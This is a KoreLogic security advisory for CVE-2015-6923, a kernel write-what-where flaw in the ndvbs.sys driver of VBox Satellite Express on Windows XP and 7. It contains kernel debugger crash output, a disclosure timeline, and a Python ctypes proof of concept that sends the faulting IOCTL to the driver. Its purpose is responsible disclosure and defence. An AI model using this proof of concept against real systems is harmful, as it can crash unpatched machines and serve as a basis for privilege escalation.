VBox Satellite Express Arbitrary Write Privilege Escalation

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation  
  
Title: VBox Satellite Express Arbitrary Write Privilege Escalation  
Advisory ID: KL-001-2015-005  
Publication Date: 2015.09.16  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: VBox Communications  
Affected Product: Satellite Express Protocol  
Affected Version: 2.3.17.3  
Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)  
CWE Classification: CWE-123: Write-what-where condition  
Impact: Arbitrary Code Execution  
Attack vector: IOCTL  
CVE-ID: CVE-2015-6923  
  
2. Vulnerability Description  
  
A vulnerability within the ndvbs module allows an attacker  
to inject memory they control into an arbitrary location they  
define. This vulnerability can be used to overwrite function  
pointers in HalDispatchTable resulting in an elevation of  
privilege.  
  
3. Technical Description  
  
Example against Windows XP:  
  
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible  
Product: WinNt, suite: TerminalServer SingleUserTS  
Built by: 2600.xpsp_sp3_qfe.101209-1646  
Machine Name:  
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0  
Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)  
System Uptime: 0 days 0:11:19.843  
  
*********************************************************************  
* *  
* Bugcheck Analysis *  
* *  
*********************************************************************  
  
Use !analyze -v to get detailed debugging information.  
BugCheck 50, {b41c5d4c, 0, 805068e1, 0}  
Probably caused by : ndvbs.sys ( ndvbs+94f )  
Followup: MachineOwner  
---------  
  
kd> kn  
Call stack: # ChildEBP RetAddr  
00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b  
01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7  
02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc  
03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211  
04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18  
05 f64fdc34 804ee129 ndvbs+0x94f  
06 f64fdc44 80574e56 nt!IopfCallDriver+0x31  
07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70  
08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7  
09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a  
0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8  
0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet  
0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc  
0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a  
0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866  
0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88  
10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e  
11 0021f6c0 1e07bd9c _ctypes+0x54d8  
12 00000000 00000000 python27!PyObject_Call+0x4c  
  
  
Example against Windows 7:  
  
Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86  
Copyright (c) Microsoft Corporation. All rights reserved.  
Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible  
Product: WinNt, suite: TerminalServer SingleUserTS Personal  
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850  
Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850  
Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)  
System Uptime: 0 days 0:27:26.358  
kd> .symfix;.reload  
Loading Kernel Symbols  
...............................................................  
................................................................  
........................  
Loading User Symbols  
Loading unloaded module list  
........  
kd> !analyze -v  
**********************************************************************  
* *  
* Bugcheck Analysis *  
* *  
**********************************************************************  
  
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)  
This is a very common bugcheck. Usually the exception address pinpoints  
the driver/function that caused the problem. Always note this address  
as well as the link date of the driver/image that contains this address.  
Some common problems are exception code 0x80000003. This means a hard  
coded breakpoint or assertion was hit, but this system was booted  
/NODEBUG. This is not supposed to happen as developers should never have  
hardcoded breakpoints in retail code, but ...  
If this happens, make sure a debugger gets connected, and the  
system is booted /DEBUG. This will let us see why this breakpoint is  
happening.  
Arguments:  
Arg1: c0000005, The exception code that was not handled  
Arg2: 929ef938, The address that the exception occurred at  
Arg3: 974f4a34, Trap Frame  
Arg4: 00000000  
  
Debugging Details:  
------------------  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx  
referenced memory at 0x%08lx. The memory could not be %s.  
FAULTING_IP:  
ndvbs+938  
929ef938 8b4604 mov eax,dword ptr [esi+4]  
  
TRAP_FRAME: 974f4a34 -- (.trap 0xffffffff974f4a34)  
ErrCode = 00000000  
eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668  
eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0 nv up ei pl zr na pe nc  
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246  
ndvbs+0x938:  
929ef938 8b4604 mov eax,dword ptr [esi+4]  
Resetting default scope  
CUSTOMER_CRASH_COUNT: 1  
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT  
BUGCHECK_STR: 0x8E  
PROCESS_NAME: python.exe  
CURRENT_IRQL: 0  
ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre  
LAST_CONTROL_TRANSFER: from 82843593 to 929ef938  
STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.  
974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938  
974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63  
974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8  
974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa  
974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a  
974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a  
0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4  
  
STACK_COMMAND: kb  
FOLLOWUP_IP:  
ndvbs+938  
929ef938 8b4604 mov eax,dword ptr [esi+4]  
  
SYMBOL_STACK_INDEX: 0  
SYMBOL_NAME: ndvbs+938  
FOLLOWUP_NAME: MachineOwner  
MODULE_NAME: ndvbs  
IMAGE_NAME: ndvbs.sys  
DEBUG_FLR_IMAGE_TIMESTAMP: 3ec77b36  
BUCKET_ID: OLD_IMAGE_ndvbs.sys  
FAILURE_BUCKET_ID: OLD_IMAGE_ndvbs.sys  
ANALYSIS_SOURCE: KM  
FAILURE_ID_HASH_STRING: km:old_image_ndvbs.sys  
FAILURE_ID_HASH: {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75}  
Followup: MachineOwner  
---------  
  
4. Mitigation and Remediation Recommendation  
  
No response from vendor; no remediation available.  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin of KoreLogic  
Security, Inc.  
  
6. Disclosure Timeline  
  
2015.05.19 - KoreLogic requests a security contact from  
[email protected].  
2015.05.29 - KoreLogic requests a security contact from  
{info,sales,marketing}@vboxcomm.com.  
2015.08.03 - 45 business days have elapsed since KoreLogic's last  
contact attempt.  
2015.09.11 - KoreLogic requests CVE from Mitre.  
2015.09.12 - Mitre issues CVE-2015-6923.  
2015.09.16 - Public disclosure.  
  
7. Proof of Concept  
  
from sys import exit  
from ctypes import *  
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory  
WriteProcessMemory = windll.kernel32.WriteProcessMemory  
DeviceIoControl = windll.ntdll.NtDeviceIoControlFile  
CreateFileA = windll.kernel32.CreateFileA  
CloseHandle = windll.kernel32.CloseHandle  
FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1  
OPEN_EXISTING = 3  
NULL = None  
  
device = "ndvbs"  
code = 0x00000ffd  
inlen = 0x0  
outlen = 0x0  
inbuf = 0x1  
outbuf = 0xffff0000  
inBufMem = "\x90"*inlen  
  
def main():  
try:  
handle = CreateFileA("\\\\.\\%s" %  
(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)  
if (handle == -1):  
print "[-] error creating handle"  
exit(1)  
except Exception as e:  
print "[-] error creating handle"  
exit(1)  
  
#NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)  
  
DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen)  
CloseHandle(handle)  
return False  
  
if __name__=="__main__":  
main()  
  
  
The contents of this advisory are copyright(c) 2015  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2  
  
iQEcBAEBCAAGBQJV+sluAAoJEE1lmiwOGYkMmZoH+gLBVOM5BWFrLAQf0G4/rGaN  
PtXTwmhGDQyh+ixOWVbgc8Ci5OpCmGFDxthpztxuxjT/YAsG2WPwNtTxaOu2S8+K  
9UK1wIe7e0Hy2Qaf2Ek6w7av7hWSXyt4Q6LJqcLTTSMHTuwbKnf3ZF5PWDLOSrSu  
hSdjlOGzQpnFuZgHKTqcbeddb3HURaSpaSDB1MMe4RCprHkn7MwpAj1HfqPByIme  
80LksJvhe5Te09dSAO+CEwvRCvgkIw36GCh6q5IRTpOyTA6Obj/Y+uTkj5S6Kklg  
sdczrlT9LXq62UZberBAJYDOP71pPzsFro7yuXoJOEza65RvJqjdpBHPehTqsWI=  
=AkKF  
-----END PGP SIGNATURE-----  
`